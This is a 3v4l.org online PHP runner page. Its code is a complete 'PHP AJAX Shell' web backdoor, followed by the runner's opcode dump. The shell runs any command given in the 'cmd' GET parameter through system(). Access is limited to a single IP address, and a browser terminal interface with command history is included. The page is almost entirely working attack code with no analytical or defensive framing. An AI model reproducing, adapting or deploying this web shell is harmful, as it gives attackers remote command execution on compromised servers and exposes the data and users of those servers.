3v4l.org

run code in 300+ PHP versions simultaneously
<?php if ($_SERVER['REMOTE_ADDR'] !== '1.1.1.1') die(); ob_start(); if (!empty($_GET['cmd'])){ $ff=$_GET['cmd']; #shell_exec($ff); system($ff); #exec($ff); #passthru($ff); } else { ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>PHP AJAX Shell</title> <script type="text/javascript" language="javascript">var CommHis=new Array();var HisP; function doReq(_1,_2,_3){var HR=false;if(window.XMLHttpRequest){HR=new XMLHttpRequest();if(HR.overrideMimeType){HR.overrideMimeType("text/xml");}} else{if(window.ActiveXObject){try{HR=new ActiveXObject("Msxml2.XMLHTTP");}catch(e){try{HR=new ActiveXObject("Microsoft.XMLHTTP");} catch(e){}}}}if(!HR){return false;}HR.onreadystatechange=function(){if(HR.readyState==4){ if(HR.status==200){if(_3){eval(_2+"(HR.responseXML)");}else{eval(_2+"(HR.responseText)");}}}};HR.open("GET",_1,true);HR.send(null);} function pR(rS){var _6=document.getElementById("outt");var _7=rS.split("nn"); var _8=document.getElementById("cmd").value;_6.appendChild(document.createTextNode(_8)); _6.appendChild(document.createElement("br"));for(var _9 in _7){var _a=document.createElement("pre"); _a.style.display="inline";line=document.createTextNode(_7[_9]);_a.appendChild(line);_6.appendChild(_a); _6.appendChild(document.createElement("br"));}_6.appendChild(document.createTextNode(":-> "));_6.scrollTop=_6.scrollHeight; document.getElementById("cmd").value="";}function keyE(_b){switch(_b.keyCode){ case 13:var _c=document.getElementById("cmd").value;if(_c){CommHis[CommHis.length]=_c;HisP=CommHis.length;var _d=document.location.href+"?cmd="+escape(_c); doReq(_d,"pR");}break; case 38:if(HisP>0){HisP--;document.getElementById("cmd").value=CommHis[HisP];}break; case 40:if(HisP<commHis.length-1){HisP++;document.getElementById("cmd").value=CommHis[HisP];}break;default:break;}} </script></head><body style="font-family:courier"> <form onsubmit="return false" style="color:#3F0;background:#000;position:relative;min-height:450px;max-height:490px"> <div id="outt" style="overflow:auto;padding:5px;height:90%;min-height:450px;max-height:490px">:-></div> <input tabindex="1" onkeyup="keyE(event)" style="color:#FFF;background:#333;width:100%;" id="cmd" type="text" /> </form> </body> </html> <?php } ?>
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 4, Position 2 = 5
Branch analysis from position: 4
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 5
2 jumps found. (Code = 43) Position 1 = 11, Position 2 = 18
Branch analysis from position: 11
1 jumps found. (Code = 42) Position 1 = 19
Branch analysis from position: 19
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 18
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/gXN6P
function name:  (null)
number of ops:  20
compiled vars:  !0 = $ff
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    2     0  E >   FETCH_R                      global              ~1      '_SERVER'
          1        FETCH_DIM_R                                      ~2      ~1, 'REMOTE_ADDR'
          2        IS_NOT_IDENTICAL                                         ~2, '1.1.1.1'
          3      > JMPZ                                                     ~3, ->5
          4    > > EXIT                                                     
    3     5    >   INIT_FCALL                                               'ob_start'
          6        DO_ICALL                                                 
    4     7        FETCH_IS                                         ~5      '_GET'
          8        ISSET_ISEMPTY_DIM_OBJ                         1  ~6      ~5, 'cmd'
          9        BOOL_NOT                                         ~7      ~6
         10      > JMPZ                                                     ~7, ->18
    5    11    >   FETCH_R                      global              ~8      '_GET'
         12        FETCH_DIM_R                                      ~9      ~8, 'cmd'
         13        ASSIGN                                                   !0, ~9
    7    14        INIT_FCALL                                               'system'
         15        SEND_VAR                                                 !0
         16        DO_ICALL                                                 
         17      > JMP                                                      ->19
   13    18    >   ECHO                                                     '%3C%21DOCTYPE+HTML+PUBLIC+%22-%2F%2FW3C%2F%2FDTD+HTML+4.01+Transitional%2F%2FEN%22+%22http%3A%2F%2Fwww.w3.org%2FTR%2Fhtml4%2Floose.dtd%22%3E%0A%3Chtml%3E%0A%3Chead%3E%0A%3Cmeta+http-equiv%3D%22Content-Type%22+content%3D%22text%2Fhtml%3B+charset%3Dutf-8%22%3E%0A%3Ctitle%3EPHP+AJAX+Shell%3C%2Ftitle%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22+language%3D%22javascript%22%3Evar+CommHis%3Dnew+Array%28%29%3Bvar+HisP%3B%0Afunction+doReq%28_1%2C_2%2C_3%29%7Bvar+HR%3Dfalse%3Bif%28window.XMLHttpRequest%29%7BHR%3Dnew+XMLHttpRequest%28%29%3Bif%28HR.overrideMimeType%29%7BHR.overrideMimeType%28%22text%2Fxml%22%29%3B%7D%7D%0Aelse%7Bif%28window.ActiveXObject%29%7Btry%7BHR%3Dnew+ActiveXObject%28%22Msxml2.XMLHTTP%22%29%3B%7Dcatch%28e%29%7Btry%7BHR%3Dnew+ActiveXObject%28%22Microsoft.XMLHTTP%22%29%3B%7D%0Acatch%28e%29%7B%7D%7D%7D%7Dif%28%21HR%29%7Breturn+false%3B%7DHR.onreadystatechange%3Dfunction%28%29%7Bif%28HR.readyState%3D%3D4%29%7B%0Aif%28HR.status%3D%3D200%29%7Bif%28_3%29%7Beval%28_2%2B%22%28HR.responseXML%29%22%29%3B%7Delse%7Beval%28_2%2B%22%28HR.responseText%29%22%29%3B%7D%7D%7D%7D%3BHR.open%28%22GET%22%2C_1%2Ctrue%29%3BHR.send%28null%29%3B%7D%0Afunction+pR%28rS%29%7Bvar+_6%3Ddocument.getElementById%28%22outt%22%29%3Bvar+_7%3DrS.split%28%22nn%22%29%3B%0Avar+_8%3Ddocument.getElementById%28%22cmd%22%29.value%3B_6.appendChild%28document.createTextNode%28_8%29%29%3B%0A_6.appendChild%28document.createElement%28%22br%22%29%29%3Bfor%28var+_9+in+_7%29%7Bvar+_a%3Ddocument.createElement%28%22pre%22%29%3B%0A_a.style.display%3D%22inline%22%3Bline%3Ddocument.createTextNode%28_7%5B_9%5D%29%3B_a.appendChild%28line%29%3B_6.appendChild%28_a%29%3B%0A_6.appendChild%28document.createElement%28%22br%22%29%29%3B%7D_6.appendChild%28document.createTextNode%28%22%3A-%3E+%22%29%29%3B_6.scrollTop%3D_6.scrollHeight%3B%0Adocument.getElementById%28%22cmd%22%29.value%3D%22%22%3B%7Dfunction+keyE%28_b%29%7Bswitch%28_b.keyCode%29%7B%0Acase+13%3Avar+_c%3Ddocument.getElementById%28%22cmd%22%29.value%3Bif%28_c%29%7BCommHis%5BCommHis.length%5D%3D_c%3BHisP%3DCommHis.length%3Bvar+_d%3Ddocument.location.href%2B%22%3Fcmd%3D%22%2Bescape%28_c%29%3B%0AdoReq%28_d%2C%22pR%22%29%3B%7Dbreak%3B%0Acase+38%3Aif%28HisP%3E0%29%7BHisP--%3Bdocument.getElementById%28%22cmd%22%29.value%3DCommHis%5BHisP%5D%3B%7Dbreak%3B%0Acase+40%3Aif%28HisP%3CcommHis.length-1%29%7BHisP%2B%2B%3Bdocument.getElementById%28%22cmd%22%29.value%3DCommHis%5BHisP%5D%3B%7Dbreak%3Bdefault%3Abreak%3B%7D%7D%0A%3C%2Fscript%3E%3C%2Fhead%3E%3Cbody+style%3D%22font-family%3Acourier%22%3E%0A%3Cform+onsubmit%3D%22return+false%22+style%3D%22color%3A%233F0%3Bbackground%3A%23000%3Bposition%3Arelative%3Bmin-height%3A450px%3Bmax-height%3A490px%22%3E%0A%3Cdiv+id%3D%22outt%22+style%3D%22overflow%3Aauto%3Bpadding%3A5px%3Bheight%3A90%25%3Bmin-height%3A450px%3Bmax-height%3A490px%22%3E%3A-%3E%3C%2Fdiv%3E%0A%3Cinput+tabindex%3D%221%22+onkeyup%3D%22keyE%28event%29%22+style%3D%22color%3A%23FFF%3Bbackground%3A%23333%3Bwidth%3A100%25%3B%22+id%3D%22cmd%22+type%3D%22text%22+%2F%3E%0A%3C%2Fform%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E%0A'
   40    19    > > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0

preferences:
189.49 ms | 1400 KiB | 17 Q